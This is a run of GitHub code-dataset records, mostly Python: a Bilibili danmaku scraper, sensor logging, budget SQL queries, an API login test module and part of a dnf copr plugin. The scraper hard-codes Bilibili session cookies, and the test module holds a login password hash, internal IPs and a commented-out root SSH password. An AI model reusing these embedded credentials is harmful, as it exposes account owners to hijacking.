\nd={1: 10, 2: 20, 3: 30, 4: 40, 5: 50, 6: 60}\n\n \n# get key with min value\nmin_key = min(d, key=d.get)\n\n#get the key with max value\nmax_key=max(d,key=d.get)\n\n\nprint(\"maximum value in the dictionary\",d.get(max_key))\nprint(\"minimum value in the dictionary\",d.get(min_key))\n\n","repo_name":"hash-eer/python-assignment-3","sub_path":"python assignment 3 dict/prog12.py","file_name":"prog12.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40427462217","text":"import csv\nimport time\n\nfrom data_filter import DataFilter\nfrom sensors import Accelerometer, Altimeter, IMU\nfrom utils import HEADERS\n\n\nclass DataLogger:\n def __init__(self, name: str, accelerometer: Accelerometer, altimeter: Altimeter, imu: IMU, dfilter: DataFilter):\n self.name = name\n self.file = open(name, \"w\")\n self.samples = 0\n self.accelerometer = accelerometer\n self.altimeter = altimeter\n self.imu = imu\n self.dfilter = dfilter\n\n self._initialize_csv()\n\n def _initialize_csv(self):\n csv.writer(self.file).writerow(HEADERS)\n\n def log_sensors(self):\n acceleration_acce_x, acceleration_acce_y, acceleration_acce_z = self.accelerometer.acceleration_acce\n altitude = self.altimeter.altitude\n acceleration_imu_x, acceleration_imu_y, acceleration_imu_z = self.imu.acceleration_imu\n linacceleration_imu_x, linacceleration_imu_y, linacceleration_imu_z = self.imu.linacceleration_imu\n eulerangle_imu_x, eulerangle_imu_y, eulerangle_imu_z = self.imu.eulerangle_imu\n gravity_imu_x, gravity_imu_y, gravity_imu_z = self.imu.gravity_imu\n\n self.dfilter.filter_data(altitude, acceleration_acce_z, linacceleration_imu_z, eulerangle_imu_z)\n kalman_acceleration = self.dfilter.kalman_acceleration\n kalman_velocity = self.dfilter.kalman_velocity\n kalman_altitude = self.dfilter.kalman_altitude\n orientation_beta = self.dfilter.orientation_beta\n\n row = [\n \"%.4f\" % time.time(), # sensors.curr_time,\n \"%.4f\" % acceleration_acce_x,\n \"%.4f\" % acceleration_acce_y,\n \"%.4f\" % acceleration_acce_z,\n \"%.4f\" % altitude,\n \"%.4f\" % acceleration_imu_x,\n \"%.4f\" % acceleration_imu_y,\n \"%.4f\" % acceleration_imu_z,\n \"%.4f\" % linacceleration_imu_x,\n \"%.4f\" % linacceleration_imu_y,\n \"%.4f\" % linacceleration_imu_z,\n \"%.4f\" % eulerangle_imu_x,\n \"%.4f\" % eulerangle_imu_y,\n \"%.4f\" % eulerangle_imu_z,\n \"%.4f\" % gravity_imu_x,\n \"%.4f\" % gravity_imu_y,\n \"%.4f\" % gravity_imu_z,\n \"%.4f\" % kalman_acceleration, # data_filter.kalman_acceleration,\n \"%.4f\" % kalman_velocity, # data_filter.kalman_velocity,\n \"%.4f\" % kalman_altitude, # data_filter.kalman_altitude,\n \"%.4f\" % orientation_beta # data_filter.orientation_beta\n ]\n csv.writer(self.file).writerow(row)\n self.samples += 1\n\n","repo_name":"noronhadaniel/ACS_2023","sub_path":"Subscale/data_logger.py","file_name":"data_logger.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"7966801816","text":"import random\nimport re\nimport time, datetime\nimport os\n\nimport csv\nimport requests\n\nfrom get_danmus import *\n\n\nclass GetDanmuSeg:\n def __init__(self, bvid):\n self.bvid = bvid\n self.headers = {\n # \"cookie\": \"SESSDATA=36227725%2C1634015792%2C54187%2A41\",\n \"cookie\": \"SESSDATA=d31bc1fc%2C1636109908%2C55010%2A51\", # zyx\n # \"cookie\": \"SESSDATA=3349b8d6%2C1633339932%2Cb8cd9*41\", # kjh\n \"origin\": 
\"http://www.bilibili.com\",\n # \"referer\": \"http://www.bilibili.com/video/BV1os41127rm\",\n \"sec-fetch-dest\": \"empty\",\n \"sec-fetch-mode\": \"cors\",\n \"sec-fetch-site\": \"same-site\",\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36\"\n # 换成自己的ua就行\n }\n\n self.oid_list, self.pubdate = self.get_oidlist_pubdate()\n\n def get_oidlist_pubdate(self):\n bvid_url = 'http://api.bilibili.com/x/player/pagelist?bvid={0}'.format(self.bvid)\n response = requests.get(bvid_url, headers=self.headers)\n json_page_list = response.json()\n page_list = json_page_list['data']\n\n oid_list = []\n for i in range(len(page_list)):\n oid_list.append(re.search(r\"'cid': (\\d+)\", str(page_list[i])).group(1))\n\n bvid_url = 'http://api.bilibili.com/x/web-interface/view?bvid={0}'.format(self.bvid)\n response = requests.get(bvid_url, headers=self.headers)\n pubdate = re.search(r'\"pubdate\":(\\d+)', response.text).group(1)\n\n return oid_list, pubdate\n\n def get_dates(self, oid):\n date_stamp = int(self.pubdate)\n now = time.time()\n\n date_list = []\n for i in range(24): # how many month\n date_month = datetime.datetime.fromtimestamp(date_stamp).strftime(\"%Y-%m\")\n url = 'http://api.bilibili.com/x/v2/dm/history/index?type=1&oid={0}&month='.format(oid) + date_month\n # print(url)\n\n response = requests.get(url=url, headers=self.headers)\n time.sleep(random.uniform(0.01, 0.02))\n\n json_data = response.json()\n print(json_data)\n if json_data['data'] is not None:\n date_list += json_data['data']\n\n date_stamp += 31 * 24 * 60 * 60\n if (date_stamp >= now):\n break\n\n return date_list\n\n def get_urls(self, page):\n oid = self.oid_list[page]\n\n date_list = self.get_dates(oid)\n\n url_list = []\n for i in range(len(date_list)):\n url = 'http://api.bilibili.com/x/v2/dm/web/history/seg.so?type=1&oid={0}&date={1}'.format(oid,\n date_list[i])\n url_list.append(url)\n\n return url_list\n\n def get_danmu_seg(self):\n print('正在爬取视频{}的弹幕数据'.format(self.bvid))\n for page in range(len(self.oid_list)):\n urls = self.get_urls(page)\n\n os.makedirs(\"./seg/\" + self.bvid + \"/page_\" + str(page))\n file_num = 0\n for i in range(len(urls)):\n if i % 5 == 0:\n seg = requests.get(urls[i], headers=self.headers)\n\n with open(r\"./seg/\" + self.bvid + \"/page_\" + str(page) + \"/seg_\" + str(file_num) + \".so\",\n \"wb\") as f:\n f.write(seg.content)\n\n print('链接{}的弹幕数据爬取成功'.format(urls[i]))\n file_num += 1\n time.sleep(random.uniform(3, 5))\n if file_num % 10 == 0:\n time.sleep(random.uniform(50, 60))\n\n time.sleep(random.uniform(50, 60))\n\n\nif __name__ == '__main__':\n with open('videos.csv', 'r') as f:\n videos = list(csv.reader(f))[0]\n\n for i in range(len(videos)):\n danmu_seg = GetDanmuSeg(videos[i])\n danmu_seg.get_danmu_seg()\n get_danmu(videos[i], len(danmu_seg.oid_list))\n","repo_name":"Danmaku-nku/Danmaku","sub_path":"get_live_commenting/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74899202028","text":"import win32gui\r\nimport os\r\nimport time\r\n\r\n\r\ndef winEnumHandler(hwnd, ctx):\r\n if win32gui.IsWindowVisible(hwnd):\r\n print(win32gui.GetWindowText(hwnd))\r\n proc = win32gui.GetWindowText(hwnd)\r\n proc2 = proc.split('\\n')\r\n for process in proc2:\r\n list1.append(process)\r\n\r\n\r\ndef openPhantom():\r\n os.chdir(r'C:/Users/PH/Desktop/')\r\n os.startfile(\"Phantom Galaxies 
Launcher\")\r\n\r\n\r\nlist1 = []\r\nlist2 = []\r\nwin32gui.EnumWindows(winEnumHandler, None)\r\nprint(list1)\r\n\r\n","repo_name":"SebastianD20/Things-I-ve-made","sub_path":"Python Scripts/OpenAndFind.py","file_name":"OpenAndFind.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70314352426","text":"from sqlalchemy import and_, case, func\n\nfrom jadetree.domain.models import (\n Account,\n BudgetEntry,\n Category,\n Transaction,\n TransactionEntry,\n TransactionLine,\n TransactionSplit,\n)\nfrom jadetree.domain.types import AccountRole, AccountType\n\n__all__ = ('q_budget_summary', 'q_budget_tuples')\n\n\ndef q_budget_tuples(session, budget_id):\n '''\n Return a list of \"Budget Tuples\" for a budget, which are 3-tuples of\n (`Category.id`, ``year``, ``month``) for each `BudgetEntry` and\n `Transaction` items associated with the budget. This is used to build up\n the budget summary of budgeted income vs. outflows by month.\n '''\n sq1 = session \\\n .query(\n TransactionSplit.category_id.label('category_id'),\n func.extract('year', Transaction.date).label('year'),\n func.extract('month', Transaction.date).label('month'),\n ).join(\n TransactionEntry,\n TransactionEntry.split_id == TransactionSplit.id,\n ).join(\n TransactionLine,\n TransactionLine.id == TransactionEntry.line_id,\n ).join(\n Account,\n Account.id == TransactionLine.account_id,\n ).join(\n Transaction,\n Transaction.id == TransactionSplit.transaction_id,\n ).filter(\n Account.role == AccountRole.Budget,\n ).distinct()\n\n # (Category, Year, Month) tuples from BudgetEntries\n sq2 = session \\\n .query(\n Category.id.label('category_id'),\n func.extract('year', BudgetEntry.month).label('year'),\n func.extract('month', BudgetEntry.month).label('month'),\n ) \\\n .join(Category, Category.id == BudgetEntry.category_id)\n\n # All (Category, Year, Month) tuples (incl. 
uncategorized)\n return sq2.union(sq1)\n\n\ndef q_budget_outflows(session, budget_id, month=None):\n '''\n '''\n sq_acct_sign = session.query(\n Account.id.label('account_id'),\n case(\n [\n (Account.type == AccountType.Liability, -1),\n (Account.type == AccountType.Expense, -1),\n ],\n else_=1,\n ).label('inflow_sign'),\n case(\n [\n (Account.type == AccountType.Liability, 1),\n (Account.type == AccountType.Expense, 1),\n ],\n else_=-1,\n ).label('outflow_sign'),\n ).subquery()\n\n # Outflows by Tuple\n return session.query(\n TransactionSplit.category_id.label('category_id'),\n func.extract('year', Transaction.date).label('year'),\n func.extract('month', Transaction.date).label('month'),\n func.sum(\n TransactionEntry.amount * sq_acct_sign.c.outflow_sign\n ).label('outflow'),\n func.count(Transaction.id.distinct()).label('num_transactions'),\n ).join(\n TransactionEntry,\n TransactionEntry.split_id == TransactionSplit.id,\n ).join(\n TransactionLine,\n TransactionLine.id == TransactionEntry.line_id,\n ).join(\n Account,\n Account.id == TransactionLine.account_id,\n ).join(\n sq_acct_sign,\n sq_acct_sign.c.account_id == Account.id,\n ).join(\n Transaction,\n Transaction.id == TransactionSplit.transaction_id,\n ).filter(\n Account.role == AccountRole.Budget,\n ).group_by('category_id', 'year', 'month')\n\n\ndef q_budget_summary(session, budget_id, month=None):\n '''\n '''\n sq_tuples = q_budget_tuples(session, budget_id).subquery()\n sq_outflows = q_budget_outflows(session, budget_id).subquery()\n\n # Budget Entries by Tuple\n sq2 = session \\\n .query(\n BudgetEntry.id.label('entry_id'),\n BudgetEntry.category_id.label('category_id'),\n func.extract('year', BudgetEntry.month).label('year'),\n func.extract('month', BudgetEntry.month).label('month'),\n BudgetEntry.amount.label('budget'),\n BudgetEntry.rollover.label('rollover'),\n BudgetEntry.notes.label('notes'),\n ) \\\n .filter(BudgetEntry.budget_id == budget_id) \\\n .subquery()\n\n # Load Outflows and Budget Entries by Tuple\n q = session \\\n .query(\n sq2.c.entry_id,\n sq_tuples.c.category_id,\n sq_tuples.c.year,\n sq_tuples.c.month,\n sq_outflows.c.outflow,\n sq_outflows.c.num_transactions,\n sq2.c.budget,\n sq2.c.rollover,\n sq2.c.notes,\n ) \\\n .outerjoin(\n sq_outflows,\n and_(\n sq_outflows.c.category_id == sq_tuples.c.category_id,\n sq_outflows.c.year == sq_tuples.c.year,\n sq_outflows.c.month == sq_tuples.c.month\n )\n ) \\\n .outerjoin(\n sq2,\n and_(\n sq2.c.category_id == sq_tuples.c.category_id,\n sq2.c.year == sq_tuples.c.year,\n sq2.c.month == sq_tuples.c.month\n )\n ) \\\n .order_by(sq_tuples.c.year, sq_tuples.c.month, sq_tuples.c.category_id)\n\n # Filter by Month\n if month is not None:\n if len(month) != 2:\n raise TypeError('Expected (year, month) tuple in q_budget_summary')\n q = q.filter(\n sq_tuples.c.year == month[0],\n sq_tuples.c.month == month[1],\n )\n\n # Return Query\n return q\n","repo_name":"asymworks/jadetree-backend","sub_path":"jadetree/database/queries/budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":5411,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"27637359565","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cost_functions\nfrom mpl_toolkits.mplot3d import Axes3D\n\nrnges = {'xlower':-5, 'xupper':5, 'ylower':-5, 'yupper':5}\nvalues = cost_functions.landmark(rnges, mode=1)\t# cost_functions.matays(rnges, mode=1)\n\ndef graph_3d():\n\tfig = plt.figure()\n\tax = fig.add_subplot(111, 
projection='3d')\n\tax.plot_surface(values[0],values[1],values[2])\n\tplt.show()\n\ndef contour():\n\tplt.contour(values[0],values[1],values[2])\n\tplt.show()\n\ndef plot_case(xn,yn):\n\tplt.contour(values[0],values[1],values[2])\n\tplt.scatter(xn,yn)\n\tplt.show()\n\nif __name__ == '__main__':\n\tprint(\"Choose the type 0/1: \",end=' ')\n\tn = int(input())\n\tif n:\n\t\tprint(n,\"here!\")\n\t\tgraph_3d()\n\telse:\n\t\tcontour()\n","repo_name":"yashasingh/Global-Search-Optimization","sub_path":"plot_graph.py","file_name":"plot_graph.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"30149165741","text":"'''\n1. 회전배열\nn = int(input())\n\narr = [1,2,3,4,5]\n\nn = n%len(arr)\n \nprint(arr[n])\n\n2. 포문 인자\n\n\narr = [1,2,3,4,5,6,7,8,9]\nfor i in range(len(arr)-1, 0, -1):\n print(arr[i])\n'''\n\nn = int(input())\n\narr = [1,2,3,4,5]\n\nn = n%len(arr)\n \nprint(arr[n])\n\n\n\nm = 8%len(arr)\nprint(m)","repo_name":"Imseungbae/algorithm","sub_path":"나동빈/연습.py","file_name":"연습.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32655032705","text":"\"\"\"\r\n模块名称: 登录模块\r\n 模块中的每一个接口至少写一个方法,当接口存在关联时,还需要写对应接口的关联方法\r\n - 接口录入\r\n - 接口关联\r\n\"\"\"\r\nimport csv\r\nimport random\r\n\r\nimport paramiko\r\n\r\nfrom Utils.SendMethod import SendMethod\r\nfrom Utils.GetKeyword import GetKeyword\r\nfrom Utils.OperationConfig import OperationConfig\r\nfrom Utils.Database import Database\r\nimport pandas\r\nimport json\r\n\r\n\r\nclass LogInInterface(object):\r\n def __init__(self):\r\n self.config = OperationConfig()\r\n self.url = self.config.get_option('test', 'url')\r\n\r\n def member_login(self):\r\n \"\"\"登录\"\"\"\r\n method = 'get' # 请求参数类型 x-www-form-urlencoded格式\r\n url = self.url + '/dbaasApiGateWay/doLogin'\r\n payload = {'username': 'supertest', 'password': 'qF3IxNmEOPOnxYLMnCMrFg=='}\r\n return SendMethod.send_method(method=method, url=url, params=payload)\r\n\r\n def member_logout(self):\r\n method = 'get' # 请求参数类型 x-www-form-urlencoded格式\r\n url = self.url + '/dbaasApiGateWay/logout'\r\n return SendMethod.send_method(method=method, url=url)\r\n\r\n def model_load(self):\r\n method = 'get'\r\n # result = self.member_login()\r\n # headers=GetKeyword.get_keyword(result, 'headers')\r\n headers = self.config.get_option('test', 'headers')\r\n headers = json.loads(headers)\r\n # headers = {\"Cookie\": \"SESSION=c2bd9bee-a369-41ad-847c-7efc387db15b\"}\r\n # print(headers,type(headers))\r\n\r\n # url = 'http://192.168.20.115/dbaasDbManage/paramGroup/paramAvailable?paramJson=%7B%22dbType%22:%22MySQL%22,%22dbVersion%22:%2210.2%22%7D'\r\n url = 'http://192.168.20.115/dbaasDbManage/paramGroup/paramAvailable?lang=zh_CN&t=1650953126708¶mJson=%7B%22dbType%22:%22MySQL%22,%22dbVersion%22:%228.0%22%7D'\r\n payload = {'dbServiceId': '1650423242502', 'variableName': 'd262da84f09d41d3bbff138d8fd38992',\r\n 't': 1650423242502}\r\n return SendMethod.send_method(method=method, url=url, params=payload, headers=headers)\r\n\r\n def model_update(self, variableName, newValue):\r\n method = 'post'\r\n headers = self.config.get_option('test', 'headers')\r\n headers = json.loads(headers)\r\n url = 'http://192.168.20.115/dbaasMariadb/config/variable/update'\r\n payload = {\r\n \"dbServiceId\": \"b75888716cf3474a9ac3647588329c5c\",\r\n \"variableName\": f\"{variableName}\",\r\n \"oldValue\": \"\",\r\n \"newValue\": 
f\"{newValue}\",\r\n \"itemDynamic\": 0\r\n }\r\n return SendMethod.send_method(method=method, url=url, json=payload, headers=headers)\r\n\r\n def get_member_token(self):\r\n \"\"\"\r\n 获取session\r\n :return:\r\n \"\"\"\r\n result = self.member_login()\r\n # print(result)\r\n a = GetKeyword.get_keyword(result, 'headers')\r\n Cookie = a.get('Set-Cookie').split(';')[0]\r\n headers = {'Cookie': f'{Cookie}'}\r\n # print(headers)\r\n self.config.set_option('test', 'headers', json.dumps(headers))\r\n\r\n def data_anxin(self):\r\n \"\"\"\r\n 对接接口\r\n :return:\r\n \"\"\"\r\n method = 'get'\r\n headers = self.config.get_option('test', 'headers')\r\n headers = json.loads(headers)\r\n url = 'http://192.168.20.115:80/essenceSecurities/mysql/api/user/create'\r\n payload = {\r\n \"clusterId\": \"bc342b8a67084346b7c316da3c0fed5d\",\r\n \"userName\": \"jtq_new\",\r\n \"pwd\": \"123123..\",\r\n \"isExpire\": \"true\",\r\n \"host\": \"%\",\r\n \"workPlatformId\": \"workOrderId-2\",\r\n \"globalPrivateList\": [\"Select\"],\r\n \"mysqlSchemaList\": [{\r\n \"schemaName\": \"autoDB\",\r\n \"charset\": \"utf8mb4\",\r\n \"sortRule\": \"utf8mb4_general_ci\",\r\n \"privateList\": [\"select\", \"delete\"],\r\n \"tableList\": [{\r\n \"table\": \"tb_user\",\r\n \"privateList\": [\"select\"]\r\n }]\r\n }],\r\n\r\n \"workPlatformName\": \"测试工单创建用户\",\r\n \"callBackServiceUrl\": \"http://www.baidu.com\",\r\n \"envType\": \"dev\",\r\n \"workOrderId\": \"workOrderId\"\r\n }\r\n return SendMethod.send_method(method=method, url=url, params=payload, headers=headers)\r\n\r\n\r\nif __name__ == '__main__':\r\n # login = LogInInterface()\r\n # # # print(login.data_get())\r\n # # # print(login.member_login())\r\n # login.get_member_token()\r\n # # # print(login.model_update())\r\n # result = login.model_load()\r\n # # print(result)\r\n #\r\n # list0 = GetKeyword.get_keywords(result, 'itemName')\r\n # list1 = list(set(list0))\r\n # print(f\"接口的元素元素个数:{len(list0)}\")\r\n # print(f\"接口的元素去重后个数:{len(list1)}\")\r\n #\r\n # #登录数据库,执行sql\r\n # db = Database()\r\n # sql = '''select item_name from dbaas.db_param_item where db_type='mysql' and db_version=8.0;'''\r\n # result_sql = db.readall(sql=sql)\r\n # list_db = [i.get(\"item_name\") for i in result_sql]\r\n # list_db = list(set(list_db))\r\n # print(f\"数据库10.2的元素个数:{len(result_sql)}\")\r\n # print(f\"数据库10.2的元素去重后个数:{len(list_db)}\")\r\n #\r\n # # 相同元素\r\n # a = [x for x in list1 if x in list_db]\r\n # # 两个列表中的不同元素\r\n # b = [y for y in (list1 + list_db) if y not in a]\r\n # print(f\"相同元素个数:{len(a)}\")\r\n # print(f\"不相同元素个数:{len(b)},元素是:{b}\")\r\n #\r\n # #重复元素\r\n # for j in b:\r\n # print(list_db.count(j), j)\r\n # d = {}\r\n # for s in list1:\r\n # count = 0\r\n # for i in list0:\r\n # if i == s:\r\n # count += 1\r\n # d[s] = count\r\n # for k, v in d.items():\r\n # if v > 1:\r\n # print(\"元素{}, 重复{}次\".format(k, v))\r\n #\r\n # # 构造传入不定长的参数\r\n # input_model_in = \"\"\r\n # for i in range(1, 10):\r\n # input_model = random.sample(list0, i)\r\n # for j in input_model:\r\n # input_model_in = input_model_in + j\r\n #\r\n # for input_model_in in list1:\r\n # # 请求修改接口,传入修改值和原始值\r\n # result_update = login.model_update(variableName=input_model_in, newValue=input_model_in)\r\n # if GetKeyword.get_keywords(result_update, 'msg') == '操作失败':\r\n # print(f\"参数{input_model_in}设置失败\")\r\n #\r\n # print(login.model_update(variableName='skip-name-resolve', newValue='skip-name-resolve'))\r\n # print(GetKeyword.get_keywords(login.model_update(variableName='skip-name-resolve', 
newValue='skip-name-resolve'), 'msg'))\r\n    # list_fail = [input_model_in for input_model_in in list1 if GetKeyword.get_keywords(login.model_update(variableName='skip-name-resolve', newValue=input_model_in), 'msg') != ['参数修改成功']]\r\n    # print(list_fail)\r\n    # # 连接主机,查询mysql参数,查询重启生效的参数\r\n    # with paramiko.Transport(('192.168.90.31', 22)) as trans:\r\n    #     trans.connect(username='root', password='root123')\r\n    #     ssh = paramiko.SSHClient()\r\n    #     ssh._transport = trans\r\n    #     stdin, stdout, stderr = ssh.exec_command('cat /etc/my.cnf')\r\n    #     my_cnf = stdout.read().decode()\r\n    #     # print(type(my_cnf),my_cnf)\r\n    #     print(my_cnf)\r\n    # # if my_cnf.find('pid-file') != -1 and my_cnf.find('old-file') == -1:\r\n    # #     print('参数创建成功')\r\n    # # else:\r\n    # #     print('未找到配置参数,原参数:{old-file},新参数:{}')\r\n    # # print(512*1024*1024*1024)\r\n    # # print(login.data_anxin())\r\n    # # print(int(\"21\")>\"3\")\r\n    # db = Database()\r\n    # sql = '''select item_name,item_value_available from dbaas.db_param_item where db_type='mysql' and item_value_type='string' ;'''\r\n    #\r\n    # result_sql = db.readall(sql=sql)\r\n    # for i in result_sql:\r\n    #     # print(i)\r\n    #     if i.get('item_value_available') != '' and (\",\" not in i.get('item_value_available')) and float(\r\n    #             i.get('item_value_available').split('-')[-1]) > (2 ** 53):\r\n    #         # print(i.get('item_value_available').split('-')[-1])\r\n    #         # a = float(i.get('item_value_available').split('-')[-1])\r\n    #         # if a>(2**53):\r\n    #         a = i.get('item_value_available')\r\n    #         b = i.get('item_name')\r\n    #         print(a, b)\r\n\r\n    # try:\r\n    #     if int(i.get('item_value_available').split('-')[-1]):\r\n    #         a = i.get('item_name')\r\n    #         b = i.get(\"item_value_available\")\r\n    #         print(a, b)\r\n    # finally:\r\n    #     print(1)\r\n    # print(result_sql)\r\n    import requests\r\n\r\n\r\n\r\n    file_path = \"无标题.csv\"  # CSV文件路径\r\n\r\n    with open(file_path, \"r\", newline=\"\") as file:\r\n        reader = csv.reader(file)\r\n        for row in reader:\r\n            print(row[0])\r\n    # with concurrent.futures.ThreadPoolExecutor(max_workers=3) as executor:\r\n    #     # 提交任务到线程池\r\n    #     # futures = [executor.submit(task) for row in reader]\r\n    #     futures = [executor.submit(lambda x: task(x), row[0]) for row in reader]\r\n    #     print(f\"Task number:\", len(futures))\r\n    #     for future in concurrent.futures.as_completed(futures):\r\n    #         try:\r\n    #             result = future.result()\r\n    #             print(f\"Task result: {result}\")\r\n    #         except Exception as e:\r\n    #             print(f\"Task encountered an exception: {e}\")\r\n","repo_name":"LIUJUNBO007/test","sub_path":"Interface/LogInInterface.py","file_name":"LogInInterface.py","file_ext":"py","file_size_in_byte":9645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"16597125967","text":"import cv2, pafy\n\n# macOS를 사용하는 경우 파인더에서 Applications(응용프로그램)> Python3.9 폴더 (또는 사용중인 Python 버전)로 이동하여 \"Install Certificates.command\"파일을 더블 클릭\n# pip install youtube_dl==2020.12.2\n# pip install pafy\n\nurl = 'https://www.youtube.com/watch?v=YF-IWSbnWr4'\nvideo = pafy.new(url)\n\nprint('title = ', video.title) # 영상 제목\nprint('video.rating = ', video.rating) # 별점\nprint('video.duration = ', video.duration) # 전체 길이\n\nbest = video.getbest() # 최적의 비디오 파일양식 정보\nprint('best.resolution', best.resolution)\n\ncap = cv2.VideoCapture(best.url)\n\nwhile True:\n    retval, frame = cap.read()\n    if not retval:\n        break\n    cv2.imshow('frame',frame)\n\n    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    edges = cv2.Canny(gray, 100, 200)\n    cv2.imshow('edges',edges)\n    key = cv2.waitKey(25)\n    if key == 27:\n        
break\n\ncv2.destroyAllWindows()","repo_name":"junho2000/opencv_python","sub_path":"chap2/2.9.py","file_name":"2.9.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"39754596380","text":"from __future__ import print_function\nfrom dnf.pycomp import PY3\nfrom dnfpluginscore import _, logger\nfrom dnf.i18n import ucd\n\nimport dnf\nimport glob\nimport json\nimport os\nimport shutil\nimport stat\nimport rpm\nimport re\n\n# Attempt importing the linux_distribution function from distro\n# If that fails, attempt to import the deprecated implementation\n# from the platform module.\ntry:\n    from distro import linux_distribution\nexcept ImportError:\n    try:\n        from platform import linux_distribution\n    except ImportError:\n        # Simple fallback for distributions that lack an implementation\n        def linux_distribution():\n            with open('/etc/os-release') as os_release_file:\n                os_release_data = {}\n                for line in os_release_file:\n                    os_release_key, os_release_value = line.rstrip().split('=')\n                    os_release_data[os_release_key] = os_release_value.strip('\"')\n                return (os_release_data['NAME'], os_release_data['VERSION_ID'], None)\n\nPLUGIN_CONF = 'copr'\n\nYES = set([_('yes'), _('y')])\nNO = set([_('no'), _('n'), ''])\n\nif PY3:\n    from configparser import ConfigParser, NoOptionError, NoSectionError\nelse:\n    from ConfigParser import ConfigParser, NoOptionError, NoSectionError\n\n@dnf.plugin.register_command\nclass CoprCommand(dnf.cli.Command):\n    \"\"\" Copr plugin for DNF \"\"\"\n\n    chroot_config = None\n\n    default_hostname = \"copr.fedorainfracloud.org\"\n    default_hub = \"fedora\"\n    default_protocol = \"https\"\n    default_port = 443\n    default_url = default_protocol + \"://\" + default_hostname\n    aliases = (\"copr\",)\n    summary = _(\"Interact with Copr repositories.\")\n    usage = _(\"\"\"\n  enable name/project [chroot]\n  disable name/project\n  remove name/project\n  list --installed/enabled/disabled\n  list --available-by-user=NAME\n  search project\n\n  Examples:\n  copr enable rhscl/perl516 epel-6-x86_64\n  copr enable ignatenkobrain/ocltoys\n  copr disable rhscl/perl516\n  copr remove rhscl/perl516\n  copr list --enabled\n  copr list --available-by-user=ignatenkobrain\n  copr search tests\n    \"\"\")\n\n    @staticmethod\n    def set_argparser(parser):\n        parser.add_argument('subcommand', nargs=1,\n                            choices=['help', 'enable', 'disable',\n                                     'remove', 'list', 'search'])\n\n        list_option = parser.add_mutually_exclusive_group()\n        list_option.add_argument('--installed', action='store_true',\n                                 help=_('List all installed Copr repositories (default)'))\n        list_option.add_argument('--enabled', action='store_true',\n                                 help=_('List enabled Copr repositories'))\n        list_option.add_argument('--disabled', action='store_true',\n                                 help=_('List disabled Copr repositories'))\n        list_option.add_argument('--available-by-user', metavar='NAME',\n                                 help=_('List available Copr repositories by user NAME'))\n\n        parser.add_argument('--hub', help=_('Specify an instance of Copr to work with'))\n\n        parser.add_argument('arg', nargs='*')\n\n    def configure(self):\n        copr_hub = None\n        copr_plugin_config = ConfigParser()\n        config_files = []\n        config_path = self.base.conf.pluginconfpath[0]\n\n        default_config_file = os.path.join(config_path, PLUGIN_CONF + \".conf\")\n        if os.path.isfile(default_config_file):\n            config_files.append(default_config_file)\n\n            copr_plugin_config.read(default_config_file)\n            if copr_plugin_config.has_option('main', 'distribution') and\\\n                    
copr_plugin_config.has_option('main', 'releasever'):\n distribution = copr_plugin_config.get('main', 'distribution')\n releasever = copr_plugin_config.get('main', 'releasever')\n self.chroot_config = [distribution, releasever]\n else:\n self.chroot_config = [False, False]\n\n for filename in os.listdir(os.path.join(config_path, PLUGIN_CONF + \".d\")):\n if filename.endswith('.conf'):\n config_file = os.path.join(config_path, PLUGIN_CONF + \".d\", filename)\n config_files.append(config_file)\n\n project = []\n if len(self.opts.arg):\n project = self.opts.arg[0].split(\"/\")\n\n if len(project) == 3 and self.opts.hub:\n logger.critical(\n _('Error: ') +\n _('specify Copr hub either with `--hub` or using '\n '`copr_hub/copr_username/copr_projectname` format')\n )\n raise dnf.cli.CliError(_('multiple hubs specified'))\n\n # Copr hub was not specified, using default hub `fedora`\n elif not self.opts.hub and len(project) != 3:\n self.copr_hostname = self.default_hostname\n self.copr_url = self.default_url\n\n # Copr hub specified with hub/user/project format\n elif len(project) == 3:\n copr_hub = project[0]\n\n else:\n copr_hub = self.opts.hub\n\n # Try to find hub in a config file\n if config_files and copr_hub:\n self.copr_url = None\n copr_plugin_config.read(sorted(config_files, reverse=True))\n hostname = self._read_config_item(copr_plugin_config, copr_hub, 'hostname', None)\n\n if hostname:\n protocol = self._read_config_item(copr_plugin_config, copr_hub, 'protocol',\n self.default_protocol)\n port = self._read_config_item(copr_plugin_config, copr_hub, 'port',\n self.default_port)\n\n self.copr_hostname = hostname\n self.copr_url = protocol + \"://\" + hostname\n if int(port) != self.default_port:\n self.copr_url += \":\" + port\n self.copr_hostname += \":\" + port\n\n if not self.copr_url:\n self.copr_hostname = copr_hub\n self.copr_url = self.default_protocol + \"://\" + copr_hub\n\n def _read_config_item(self, config, hub, section, default):\n try:\n return config.get(hub, section)\n except (NoOptionError, NoSectionError):\n return default\n\n def run(self):\n subcommand = self.opts.subcommand[0]\n\n if subcommand == \"help\":\n self.cli.optparser.print_help(self)\n return 0\n if subcommand == \"list\":\n if self.opts.available_by_user:\n self._list_user_projects(self.opts.available_by_user)\n return\n else:\n self._list_installed_repositories(self.base.conf.reposdir[0],\n self.opts.enabled, self.opts.disabled)\n return\n\n try:\n project_name = self.opts.arg[0]\n except (ValueError, IndexError):\n logger.critical(\n _('Error: ') +\n _('exactly two 